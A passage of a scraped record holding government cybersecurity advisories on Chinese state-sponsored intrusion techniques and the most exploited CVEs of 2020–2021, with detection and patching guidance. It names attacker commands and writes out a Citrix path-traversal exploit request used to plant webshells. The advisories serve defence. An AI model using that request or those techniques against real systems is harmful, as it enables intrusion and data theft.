\n \n### Tactics: _Discovery_ [[TA0007](<https://attack.mitre.org/versions/v9/tactics/TA0007>)]\n\n_Table IX: Chinese state-sponsored cyber actors\u2019 Discovery TTPs with detection and mitigation recommendations_\n\nThreat Actor Technique / \nSub-Techniques | Threat Actor Procedure(s) | Detection and Mitigation Recommendations | Defensive Tactics and Techniques \n---|---|---|--- \n \nFile and Directory Discovery [[T1083](<https://attack.mitre.org/versions/v9/techniques/T1083>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using multiple implants with file system enumeration and traversal capabilities.\n\n| \n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. WMI and PowerShell should also be monitored.\n\n| \n\nDetect: \n\n * User Behavior Analysis\n\n * Job Function Access Pattern Analysis [[D3-JFAPA](<https://d3fend.mitre.org/technique/d3f:JobFunctionAccessPatternAnalysis>)]\n\n * Process Analysis \n\n * Database Query String Analysis [[D3-DQSA](<https://d3fend.mitre.org/technique/d3f:DatabaseQueryStringAnalysis>)]\n\n * File Access Pattern Analysis [[D3-FAPA](<https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis>)]\n\n * Process Spawn Analysis [[D3-PSA](<https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis>)] \n \nPermission Group Discovery [[T1069](<https://attack.mitre.org/versions/v9/techniques/T1069>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using commands, including `net group` and `net localgroup`, to enumerate the different user groups on the target network. \n\n| \n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.\n\n| \n\nDetect: \n\n * Process Analysis \n\n * Process Spawn Analysis [[D3-PSA](<https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis>)]\n\n * System Call Analysis [[D3-SCA](<https://d3fend.mitre.org/technique/d3f:SystemCallAnalysis>)]\n\n * User Behavior Analysis [[D3-UBA](<https://d3fend.mitre.org/technique/d3f:UserBehaviorAnalysis>)] \n \nProcess Discovery [[T1057](<https://attack.mitre.org/versions/v9/techniques/T1057>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using commands, including `tasklist`, `jobs`, `ps`, or `taskmgr`, to reveal the running processes on victim devices.\n\n| \n\nNormal, benign system and network events that look like process discovery may be uncommon, depending on the environment and how they are used. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell. \n\n| \n\nDetect: \n\n * Process Analysis \n\n * Process Spawn Analysis [[D3-PSA](<https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis>)]\n\n * System Call Analysis [[D3-SCA](<https://d3fend.mitre.org/technique/d3f:SystemCallAnalysis>)]\n\n * User Behavior Analysis [[D3-UBA](<https://d3fend.mitre.org/technique/d3f:UserBehaviorAnalysis>)] \n \nNetwork Service Scanning [[T1046](<https://attack.mitre.org/versions/v9/techniques/T1046>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using `Nbtscan` and `nmap` to scan and enumerate target network information.\n\n| \n\n\u2022 Ensure that unnecessary ports and services are closed to prevent discovery and potential exploitation. \n\u2022 Use network intrusion detection and prevention systems to detect and prevent remote service scans such as `Nbtscan` or `nmap`. \n\u2022 Ensure proper network segmentation is followed to protect critical servers and devices to help mitigate potential exploitation.\n\n| \n\nDetect: \n\n * Network Traffic Analysis\n\n * Connection Attempt Analysis [[D3-CAA](<https://d3fend.mitre.org/technique/d3f:ConnectionAttemptAnalysis>)]\n\nIsolate:\n\n * Network Isolation\n\n * Inbound Traffic Filtering [[D3-ITF](<https://d3fend.mitre.org/technique/d3f:InboundTrafficFiltering>)] \n \nRemote System Discovery [[T1018](<https://attack.mitre.org/versions/v9/techniques/T1018>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using Base-64 encoded commands, including `ping`, `net group`, and `net user` to enumerate target network information.\n\n| \n\nMonitor for processes that can be used to discover remote systems, such as `ping.exe` and `tracert.exe`, especially when executed in quick succession.\n\n| \n\nDetect: \n\n * Process Analysis \n\n * Process Spawn Analysis [[D3-PSA](<https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis>)]\n\n * User Behavior Analysis\n\n * Job Function Access Pattern Analysis [[D3-JFAPA](<https://d3fend.mitre.org/technique/d3f:JobFunctionAccessPatternAnalysis>)] \n \n### Tactics: _Lateral Movement_ [[TA0008](<https://attack.mitre.org/versions/v9/tactics/TA0008>)]\n\n_Table X: Chinese state-sponsored cyber actors\u2019 Lateral Movement TTPs with detection and mitigation recommendations_\n\nThreat Actor Technique / \nSub-Techniques | Threat Actor Procedure(s) | Detection and Mitigation Recommendations | Defensive Tactics and Techniques \n---|---|---|--- \n \nExploitation of Remote Services [[T1210](<https://attack.mitre.org/versions/v9/techniques/T1210>)]\n\n| \n\nChinese state-sponsored cyber actors used valid accounts to log into a service specifically designed to accept remote connections, such as telnet, SSH, RDP, and Virtual Network Computing (VNC). The actor may then perform actions as the logged-on user.\n\nChinese state-sponsored cyber actors also used on-premises Identity and Access Management (IdAM) and federation services in hybrid cloud environments in order to pivot to cloud resources.\n\n| \n\nChinese state-sponsored cyber actors used valid accounts to log into a service specifically designed to accept remote connections, such as telnet, SSH, RDP, and Virtual Network Computing (VNC). The actor may then perform actions as the logged-on user.\n\nChinese state-sponsored cyber actors also used on-premises Identity and Access Management (IdAM) and federation services in hybrid cloud environments in order to pivot to cloud resources.\n\n * Disable or remove unnecessary services.\n\n * Minimize permissions and access for service accounts.\n\n * Perform vulnerability scanning and update software regularly.\n\n * Use threat intelligence and open-source exploitation databases to determine services that are targets for exploitation.\n\n| \n\nDetect: \n\n * Network Traffic Analysis\n\n * Remote Terminal Session Detection [[D3-RTSD](<https://d3fend.mitre.org/technique/d3f:RemoteTerminalSessionDetection>)] \n\n * User Behavior Analysis [[D3-UBA](<https://d3fend.mitre.org/technique/d3f:UserBehaviorAnalysis>)]\n\nIsolate:\n\n * Execution Isolation\n\n * Mandatory Access Control [[D3-MAC](<https://d3fend.mitre.org/technique/d3f:MandatoryAccessControl>)] \n \n### Tactics: _Collection_ [[TA0009](<https://attack.mitre.org/versions/v9/tactics/TA0009>)]\n\n_Table XI: Chinese state-sponsored cyber actors\u2019 Collection TTPs with detection and mitigation recommendations_\n\nThreat Actor Technique / \nSub-Techniques | Threat Actor Procedure(s) | Detection and Mitigation Recommendations | Defensive Tactics and Techniques \n---|---|---|--- \n \nArchive Collected Data [[T1560](<https://attack.mitre.org/versions/v9/techniques/T1560>)]\n\n| \n\nChinese state-sponsored cyber actors used compression and encryption of exfiltration files into RAR archives, and subsequently utilizing cloud storage services for storage.\n\n| \n\n * Scan systems to identify unauthorized archival utilities or methods unusual for the environment.\n\n * Monitor command-line arguments for known archival utilities that are not common in the organization's environment.\n\n| \n\nDetect: \n\n * Process Analysis \n\n * File Access Pattern Analysis [[D3-FAPA](<https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis>)]\n\n * Process Spawn Analysis [[D3-PSA](<https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis>)]\n\nIsolate:\n\n * Execution Isolation\n\n * Executable Denylisting [[D3-EDL](<https://d3fend.mitre.org/technique/d3f:ExecutableDenylisting>)] \n \nClipboard Data [[T1115](<https://attack.mitre.org/versions/v9/techniques/T1115>)]\n\n| \n\nChinese state-sponsored cyber actors used RDP and execute `rdpclip.exe` to exfiltrate information from the clipboard.\n\n| \n\n * Access to the clipboard is a legitimate function of many applications on an operating system. If an organization chooses to monitor for this behavior, then the data will likely need to be correlated against other suspicious or non-user-driven activity (e.g. excessive use of `pbcopy/pbpaste` (Linux) or `clip.exe` (Windows) run by general users through command line).\n\n * If possible, disable use of RDP and other file sharing protocols to minimize a malicious actor's ability to exfiltrate data.\n\n| \n\nDetect:\n\n * Network Traffic Analysis\n\n * Remote Terminal Session Detection [[D3-RTSD](<https://d3fend.mitre.org/technique/d3f:RemoteTerminalSessionDetection>)]\n\nIsolate:\n\n * Network Isolation\n\n * Inbound Traffic Filtering [[D3-ITF](<https://d3fend.mitre.org/technique/d3f:InboundTrafficFiltering>)]\n\n * Outbound Traffic Filtering [[D3-OTF](<https://d3fend.mitre.org/technique/d3f:OutboundTrafficFiltering>)] \n \nData Staged [[T1074](<https://attack.mitre.org/versions/v9/techniques/T1074>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using the `mv` command to export files into a location, like a compromised Microsoft Exchange, IIS, or emplaced webshell prior to compressing and exfiltrating the data from the target network.\n\n| \n\nProcesses that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as using 7-Zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.\n\n| \n\nDetect: \n\n * Process Analysis\n\n * File Access Pattern Analysis [[D3-FAPA](<https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis>)] \n \nEmail Collection [[T1114](<https://attack.mitre.org/versions/v9/techniques/T1114>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using the `New-MailboxExportReques`t PowerShell cmdlet to export target email boxes.\n\n| \n\n * Audit email auto-forwarding rules for suspicious or unrecognized rulesets.\n\n * Encrypt email using public key cryptography, where feasible.\n\n * Use MFA on public-facing mail servers.\n\n| \n\nHarden:\n\n * Credential Hardening\n\n * Multi-factor Authentication [[D3-MFA](<https://d3fend.mitre.org/technique/d3f:Multi-factorAuthentication>)]\n\n * Message Hardening\n\n * Message Encryption [[D3-MENCR](<https://d3fend.mitre.org/technique/d3f:MessageEncryption>)]\n\nDetect: \n\n * Process Analysis [[D3-PA](<https://d3fend.mitre.org/technique/d3f:ProcessAnalysis>)] \n \n### Tactics: _Command and Control _[[TA0011](<https://attack.mitre.org/versions/v9/tactics/TA0011>)]\n\n_Table XII: Chinese state-sponsored cyber actors\u2019 Command and Control TTPs with detection and mitigation recommendations_\n\nThreat Actor Technique / \nSub-Techniques \n| Threat Actor Procedure(s) | Detection and Mitigation Recommendations | Defensive Tactics and Techniques \n---|---|---|--- \n \nApplication Layer Protocol [[T1071](<https://attack.mitre.org/versions/v9/techniques/T1071>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed:\n\n * Using commercial cloud storage services for command and control.\n\n * Using malware implants that use the Dropbox\u00ae API for C2 and a downloader that downloads and executes a payload using the Microsoft OneDrive\u00ae API.\n\n| \n\nUse network intrusion detection and prevention systems with network signatures to identify traffic for specific adversary malware.\n\n| \n\nDetect: \n\n * Network Traffic Analysis\n\n * Client-server Payload Profiling [[D3-CSPP](<https://d3fend.mitre.org/technique/d3f:Client-serverPayloadProfiling>)]\n\n * File Carving [[D3-FC](<https://d3fend.mitre.org/technique/d3f:FileCarving>)]\n\nIsolate: \n\n * Network Isolation\n\n * DNS Denylisting [[D3-DNSDL](<https://d3fend.mitre.org/technique/d3f:DNSDenylisting>)] \n \nIngress Tool Transfer [[T1105](<https://attack.mitre.org/versions/v9/techniques/T1105>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed importing tools from GitHub or infected domains to victim networks. In some instances. Chinese state-sponsored cyber actors used the Server Message Block (SMB) protocol to import tools into victim networks.\n\n| \n\n * Perform ingress traffic analysis to identify transmissions that are outside of normal network behavior. \n\n * Do not expose services and protocols (such as File Transfer Protocol [FTP]) to the Internet without strong business justification.\n\n * Use signature-based network intrusion detection and prevention systems to identify adversary malware coming into the network.\n\n| \n\nIsolate:\n\n * Network Isolation\n\n * Inbound Traffic Filtering [[D3-ITF](<https://d3fend.mitre.org/technique/d3f:InboundTrafficFiltering>)] \n \nNon-Standard Port [[T1571](<https://attack.mitre.org/versions/v9/techniques/T1571>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using a non-standard SSH port to establish covert communication channels with VPS infrastructure. \n\n| \n\n * Use signature-based network intrusion detection and prevention systems to identify adversary malware calling back to C2.\n\n * Configure firewalls to limit outgoing traffic to only required ports based on the functions of that network segment.\n\n * Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port.\n\n| \n\nDetect: \n\n * Network Traffic Analysis\n\n * Client-server Payload Profiling [[D3-CSPP](<https://d3fend.mitre.org/technique/d3f:Client-serverPayloadProfiling>)]\n\n * Protocol Metadata Anomaly Detection [[D3-PMAD](<https://d3fend.mitre.org/technique/d3f:ProtocolMetadataAnomalyDetection>)]\n\nIsolate:\n\n * Network Isolation\n\n * Inbound Traffic Filtering [[D3-ITF](<https://d3fend.mitre.org/technique/d3f:InboundTrafficFiltering>)]\n\n * Outbound Traffic Filtering [[D3-OTF](<https://d3fend.mitre.org/technique/d3f:OutboundTrafficFiltering>)] \n \nProtocol Tunneling [[T1572](<https://attack.mitre.org/versions/v9/techniques/T1572>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using tools like dog-tunnel and `dns2tcp.exe` to conceal C2 traffic with existing network activity. \n\n| \n\n * Monitor systems for connections using ports/protocols commonly associated with tunneling, such as SSH (port 22). Also monitor for processes commonly associated with tunneling, such as Plink and the OpenSSH client.\n\n * Analyze packet contents to detect application layer protocols that do not follow the expected protocol standards.\n\n * Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server) \n\n| \n\nDetect: \n\n * Network Traffic Analysis\n\n * Protocol Metadata Anomaly Detection [[D3-PMAD](<https://d3fend.mitre.org/technique/d3f:ProtocolMetadataAnomalyDetection>)] \n \nProxy [[T1090](<https://attack.mitre.org/versions/v9/techniques/T1090>)]: \n\n * Multi-Hop Proxy [[T1090.003](<https://attack.mitre.org/versions/v9/techniques/T1090/003>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using a network of VPSs and small office and home office (SOHO) routers as part of their operational infrastructure to evade detection and host C2 activity. Some of these nodes operate as part of an encrypted proxy service to prevent attribution by concealing their country of origin and TTPs.\n\n| \n\nMonitor traffic for encrypted communications originating from potentially breached routers to other routers within the organization. Compare the source and destination with the configuration of the device to determine if these channels are authorized VPN connections or other encrypted modes of communication.\n\n * Alert on traffic to known anonymity networks (such as Tor) or known adversary infrastructure that uses this technique.\n\n * Use network allow and blocklists to block traffic to known anonymity networks and C2 infrastructure.\n\n| \n\nDetect: \n\n * Network Traffic Analysis\n\n * Protocol Metadata Anomaly Detection [[D3-PMAD](<https://d3fend.mitre.org/technique/d3f:ProtocolMetadataAnomalyDetection>)]\n\n * Relay Pattern Analysis [[D3-RPA](<https://d3fend.mitre.org/technique/d3f:RelayPatternAnalysis>)]\n\nIsolate: \n\n * Network Isolation\n\n * Outbound Traffic Filtering [[D3-OTF](<https://d3fend.mitre.org/technique/d3f:OutboundTrafficFiltering>)] \n \n### Appendix B: MITRE ATT&CK Framework \n\n\n\n_Figure 2: MITRE ATT&CK Enterprise tactics and techniques used by Chinese state-sponsored cyber actors ([Click here for the downloadable JSON file](<https://github.com/nsacyber/chinese-state-sponsored-cyber-operations-observed-ttps>).) _\n\n### Contact Information\n\nTo report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at [www.fbi.gov/contact-us/field](<http://www.fbi.gov/contact-us/field>), or the FBI\u2019s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by e-mail at [CyWatch@fbi.gov](<mailto:CyWatch@fbi.gov>). When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact.\n\nTo request incident response resources or technical assistance related to these threats, contact CISA at [Central@cisa.dhs.gov](<mailto:Central@cisa.dhs.gov>).\n\nFor NSA client requirements or general cybersecurity inquiries, contact the NSA Cybersecurity Requirements Center at 410-854-4200 or [Cybersecurity_Requests@nsa.gov.](<mailto:Cybersecurity_Requests@nsa.gov>)\n\nMedia Inquiries / Press Desk: \n\u2022 NSA Media Relations, 443-634-0721, [MediaRelations@nsa.gov](<mailto:MediaRelations@nsa.gov>) \n\u2022 CISA Media Relations, 703-235-2010, [CISAMedia@cisa.dhs.gov](<mailto:CISAMedia@cisa.dhs.gov>) \n\u2022 FBI National Press Office, 202-324-3691, [npo@fbi.gov](<mailto:npo@fbi.gov>)\n\n### References\n\n[[1] FireEye: This is Not a Test: APT41 Initiates Global Intrusion Campaign Using Multiple Exploits](<https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html>)\n\n### Revisions\n\nJuly 19, 2021: Initial Version\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-08-20T12:00:00", "type": "ics", "title": "Chinese State-Sponsored Cyber Operations: Observed TTPs", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2019-19781", "CVE-2020-5902", "CVE-2023-27350"], "modified": "2021-08-20T12:00:00", "id": "AA21-200B", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-200b", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-27T16:31:55", "description": "### Summary\n\nThis Joint Cybersecurity Advisory was coauthored by the U.S. Cybersecurity and Infrastructure Security Agency (CISA), the Australian Cyber Security Centre (ACSC), the United Kingdom\u2019s National Cyber Security Centre (NCSC), and the U.S. Federal Bureau of Investigation (FBI). \n\nThis advisory provides details on the top 30 vulnerabilities\u2014primarily Common Vulnerabilities and Exposures (CVEs)\u2014routinely exploited by malicious cyber actors in 2020 and those being widely exploited thus far in 2021. \n\nCyber actors continue to exploit publicly known\u2014and often dated\u2014software vulnerabilities against broad target sets, including public and private sector organizations worldwide. However, entities worldwide can mitigate the vulnerabilities listed in this report by applying the available patches to their systems and implementing a centralized patch management system. \n\nClick here for a PDF version of this report.\n\n### Technical Details\n\n### Key Findings\n\nIn 2020, cyber actors readily exploited recently disclosed vulnerabilities to compromise unpatched systems. Based on available data to the U.S. Government, a majority of the top vulnerabilities targeted in 2020 were disclosed during the past two years. Cyber actor exploitation of more recently disclosed software flaws in 2020 probably stems, in part, from the expansion of remote work options amid the COVID-19 pandemic. The rapid shift and increased use of remote work options, such as virtual private networks (VPNs) and cloud-based environments, likely placed additional burden on cyber defenders struggling to maintain and keep pace with routine software patching.\n\n**Four of the most targeted vulnerabilities in 2020 affected remote work, VPNs, or cloud-based technologies. **Many VPN gateway devices remained unpatched during 2020, with the growth of remote work options challenging the ability of organizations to conduct rigorous patch management.\n\nCISA, ACSC, the NCSC, and FBI consider the vulnerabilities listed in table 1 to be the topmost regularly exploited CVEs by cyber actors during 2020. \n\n_Table 1:Top Routinely Exploited CVEs in 2020_\n\nVendor\n\n| \n\nCVE\n\n| \n\nType \n \n---|---|--- \n \nCitrix\n\n| \n\nCVE-2019-19781\n\n| \n\narbitrary code execution \n \nPulse\n\n| \n\nCVE 2019-11510\n\n| \n\narbitrary file reading \n \nFortinet\n\n| \n\nCVE 2018-13379\n\n| \n\npath traversal \n \nF5- Big IP\n\n| \n\nCVE 2020-5902\n\n| \n\nremote code execution (RCE) \n \nMobileIron\n\n| \n\nCVE 2020-15505\n\n| \n\nRCE \n \nMicrosoft\n\n| \n\nCVE-2017-11882\n\n| \n\nRCE \n \nAtlassian\n\n| \n\nCVE-2019-11580\n\n| \n\nRCE \n \nDrupal\n\n| \n\nCVE-2018-7600\n\n| \n\nRCE \n \nTelerik\n\n| \n\nCVE 2019-18935\n\n| \n\nRCE \n \nMicrosoft\n\n| \n\nCVE-2019-0604\n\n| \n\nRCE \n \nMicrosoft\n\n| \n\nCVE-2020-0787\n\n| \n\nelevation of privilege \n \nMicrosoft\n\n| \n\nCVE-2020-1472\n\n| \n\nelevation of privilege \n \nIn 2021, malicious cyber actors continued to target vulnerabilities in perimeter-type devices. Among those highly exploited in 2021 are vulnerabilities in Microsoft, Pulse, Accellion, VMware, and Fortinet.\n\nCISA, ACSC, the NCSC, and FBI assess that public and private organizations worldwide remain vulnerable to compromise from the exploitation of these CVEs. Malicious cyber actors will most likely continue to use older known vulnerabilities, such as CVE-2017-11882 affecting Microsoft Office, as long as they remain effective and systems remain unpatched. Adversaries\u2019 use of known vulnerabilities complicates attribution, reduces costs, and minimizes risk because they are not investing in developing a zero-day exploit for their exclusive use, which they risk losing if it becomes known. \n\nOrganizations are encouraged to remediate or mitigate vulnerabilities as quickly as possible to reduce the risk of exploitation. Most can be remediated by patching and updating systems. Organizations that have not remediated these vulnerabilities should investigate for the presence of IOCs and, if compromised, initiate incident response and recovery plans. See the Contact Information section below for how to reach CISA to report an incident or request technical assistance.\n\n### 2020 CVEs\n\nCISA, ACSC, the NCSC, and FBI have identified the following as the topmost exploited vulnerabilities by malicious cyber actors from 2020: CVE-2019-19781, CVE-2019-11510, CVE-2018-13379, CVE-2020-5902, CVE-2020-15505, CVE-2020-0688, CVE-2019-3396, CVE-2017-11882, CVE-2019-11580, CVE-2018-7600, CVE 2019-18935, CVE-2019-0604, CVE-2020-0787, CVE-2020-1472.[[1](<https://media.defense.gov/2021/Apr/15/2002621240/-1/-1/0/CSA_SVR_TARGETS_US_ALLIES_UOO13234021.PDF>)][[2](<https://media.defense.gov/2021/May/07/2002637232/-1/-1/0/ADVISORY%20FURTHER%20TTPS%20ASSOCIATED%20WITH%20SVR%20CYBER%20ACTORS.PDF>)][[3](<https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>)] Among these vulnerabilities, CVE-2019-19781 was the most exploited flaw in 2020, according to U.S. Government technical analysis.CVE-2019-19781 is a recently disclosed critical vulnerability in Citrix\u2019s Application Delivery Controller (ADC)\u2014a load balancing application for web, application, and database servers widely use throughout the United States.[[4](<https://www.cyber.gov.au/acsc/view-all-content/advisories/2020-001-4-remediation-critical-vulnerability-citrix-application-delivery-controller-and-citrix-gateway>)][[5](<https://www.ncsc.gov.uk/news/citrix-alert>)] Nation-state and criminal cyber actors most likely favor using this vulnerability because it is easy to exploit, Citrix servers are widespread, and exploitation enables the actors to perform unauthorized RCE on a target system.[[6](<https://us-cert.cisa.gov/ncas/alerts/aa20-296a>)] \n\nIdentified as emerging targets in early 2020,[[7](<https://us-cert.cisa.gov/ncas/alerts/aa20-133a>)] unremediated instances of CVE-2019-19781 and CVE-2019-11510 continued to be exploited throughout the year by nation-state advanced persistent threat actors (APTs) who leveraged these and other vulnerabilities, such as CVE-2018-13379[[8](<https://www.cyber.gov.au/acsc/view-all-content/alerts/apt-exploitation-fortinet-vulnerabilities>)][[9](<https://www.ncsc.gov.uk/news/critical-risk-unpatched-fortinet-vpn-devices>)], in VPN services[[10](<https://media.defense.gov/2019/Oct/07/2002191601/-1/-1/0/Mitigating%20Recent%20VPN%20Vulnerabilities%20-%20Copy.pdf>)][[11](<https://www.ncsc.gov.uk/news/alert-vpn-vulnerabilities>)] to compromise an array of organizations, including those involved in COVID-19 vaccine development.[[12]](<https://media.defense.gov/2020/Jul/16/2002457639/-1/-1/0/NCSC_APT29_ADVISORY-QUAD-OFFICIAL-20200709-1810.PDF>)[[13](<https://www.cyber.gov.au/acsc/view-all-content/advisories/summary-tactics-techniques-and-procedures-used-target-australian-networks>)]\n\nThe CVE-2019-11510 vulnerability in Pulse Connect Secure VPN was also frequently targeted by nation-state APTs. Actors can exploit the vulnerability to steal the unencrypted credentials for all users on a compromised Pulse VPN server and retain unauthorized credentials for all users on a compromised Pulse VPN server and can retain unauthorize access after the system is patched unless all compromised credentials are changed. Nation-state APTs also commonly exploited CVE-2020-15505 and CVE-2020-5902.[[14](<https://us-cert.cisa.gov/ncas/alerts/aa20-010a>)][[15](<https://us-cert.cisa.gov/ncas/alerts/aa20-010a>)][[16](<https://www.cisa.gov/blog/2020/07/16/emergency-directive-ed-20-03-windows-dns-server-vulnerability>)][[17](<https://www.ncsc.gov.uk/news/alert-multiple-actors-attempt-exploit-mobileiron-vulnerability>)]\n\n### 2021 CVEs\n\nIn 2021, cyber actors continued to target vulnerabilities in perimeter-type devices. In addition to the 2020 CVEs listed above, organizations should prioritize patching for the following CVEs known to be exploited. \n\n * **Microsoft Exchange: **CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065 \n * See CISA\u2019s Alert: Mitigate Microsoft Exchange Server Vulnerabilities for more information on identifying and mitigating malicious activity concerning these vulnerabilities.\n * **Pulse Secure:** CVE-2021-22893, CVE-2021-22894, CVE-2021-22899, and CVE-2021-22900 \n * See CISA\u2019s Alert: Exploitation of Pulse Connect Secure Vulnerabilities for more information on how to investigate and mitigate this malicious activity.\n * **Accellion:** CVE-2021-27101, CVE-2021-27102, CVE-2021-27103, CVE-2021-27104 \n * See the Australia-New Zealand-Singapore-UK-U.S. Joint Cybersecurity Advisory: Exploitation of Accellion File Transfer Appliance for technical details and mitigations.\n * **VMware:** CVE-2021-21985 \n * See CISA\u2019s Current Activity: Unpatched VMware vCenter Software for more information and guidance. \n * **Fortinet:** CVE-2018-13379, CVE-2020-12812, and CVE-2019-5591 \n * See the CISA-FBI Joint Cybersecurity Advisory: APT Actors Exploit Vulnerabilities to Gain Initial Access for Future Attacks for more details and mitigations. \n\n### Mitigations and Indicators of Compromise\n\nOne of the most effective best practices to mitigate many vulnerabilities is to update software versions once patches are available and as soon as is practicable. If this is not possible, consider applying temporary workarounds or other mitigations, if provided by the vendor. If an organization is unable to update all software shortly after a patch is released, prioritize implementing patches for CVEs that are already known to be exploited or that would be accessible to the largest number of potential attackers (such as internet-facing systems). This advisory highlights vulnerabilities that should be considered as part of the prioritization process. To further assist remediation, automatic software updates should be enabled whenever possible. \n\nFocusing scarce cyber defense resources on patching those vulnerabilities that cyber actors most often use offers the potential of bolstering network security while impeding our adversaries\u2019 operations. For example, nation-state APTs in 2020 extensively relied on a single RCE vulnerability discovered in the Atlassian Crow, a centralized identity management and application (CVE-2019-11580) in its reported operations. A concerted focus on patching this vulnerability could have a relative broad impact by forcing the actors to find alternatives, which may not have the same broad applicability to their target set. \n\nAdditionally, attackers commonly exploit weak authentication processes, particularly in external-facing devices. Organizations should require multi-factor authentication to remotely access networks from external sources, especially for administrator or privileged accounts.\n\nTables 2\u201314 provide more details about, and specific mitigations for, each of the top exploited CVEs in 2020. \n\n**Note:** The lists of associated malware corresponding to each CVE below are not meant to be exhaustive but intended to identify a malware family commonly associated with exploiting the CVE. \n\n\n_Table 2: CVE-2019-19781 Vulnerability Details_\n\n**Citrix Netscaler Directory Traversal (CVE-2019-19781)** \n \n--- \n \n_**Vulnerability Description**_ \nCitrix Netscaler Application Delivery Control (ADC) is vulnerable to RCE and full system compromise due to poor access controls, thus allowing directory traversal. \n\n| \n\n_**CVSS 3.02**_\n\nCritical \n \n_**Vulnerability Discussion, IOCs, and Malware Campaigns**_\n\nThe lack of adequate access controls allows an attacker to enumerate system directories for vulnerable code (directory traversal). In this instance, Citrix ADC maintains a vulnerable Perl script (`newbm.pl`) that, when accessed via `HTTP POST` request (`POST https://$TARGET/vpn/../vpn/portal/scripts/newbm.pl`), allows local operating system (OS) commands to execute. Attackers can use this functionality to upload/execute command and control (C2) software (webshell or reverse-shell executable) using embedded commands (e.g.,` curl`, `wget`, `Invoke-WebRequest`) and gain unauthorized access to the OS. \n\n_Multiple malware campaigns, including NOTROBIN, have taken advantage of this vulnerability._\n\n| \n\n**_Fix_**\n\n[Patch Available](<https://www.citrix.com/blogs/2020/01/24/citrix-releases-final-fixes-for-cve-2019-19781/>) \n \n**_Recommended Mitigations_**\n\n * Implement the appropriate refresh build according to the vulnerability details outlined by the vendor: Citrix: Mitigation Steps for CVE-2019-19781\n * If possible, only allow the VPN to communicate with known Internet Protocol (IP) addresses (allow-list). \n \n_**Detection Methods**_\n\n * CISA has developed a free detection tool for this vulnerability: [cisagov/check-cve-2019-19781](<https://github.com/cisagov/check-cve-2019-19781>): Test a host for susceptibility to CVE-2019-19781.\n * Nmap developed a script that can be used with the port scanning engine: [CVE-2019-19781 - Citrix ADC Path Traversal #1893](<https://github.com/nmap/nmap/pull/1893/files>).\n * Citrix also developed a free tool for detecting compromises of Citrix ADC Appliances related to CVE-2019-19781: [Citrix / CVE-2019-19781: IOC Scanner for CVE-2019-19781](<https://github.com/citrix/ioc-scanner-CVE-2019-19781>).\n * CVE-2019-19781 is commonly exploited to install web shell malware. The National Security Agency (NSA) provides guidance on detecting and preventing web shell malware at <https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF> and signatures at <https://github.com/nsacyber/Mitigating-Web-Shells>. \n \n**_Vulnerable Technologies and Versions_** \nCitrix ADC and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0 \n \n_**References and Additional Guidance**_\n\n * [Citrix Blog: Citrix releases final 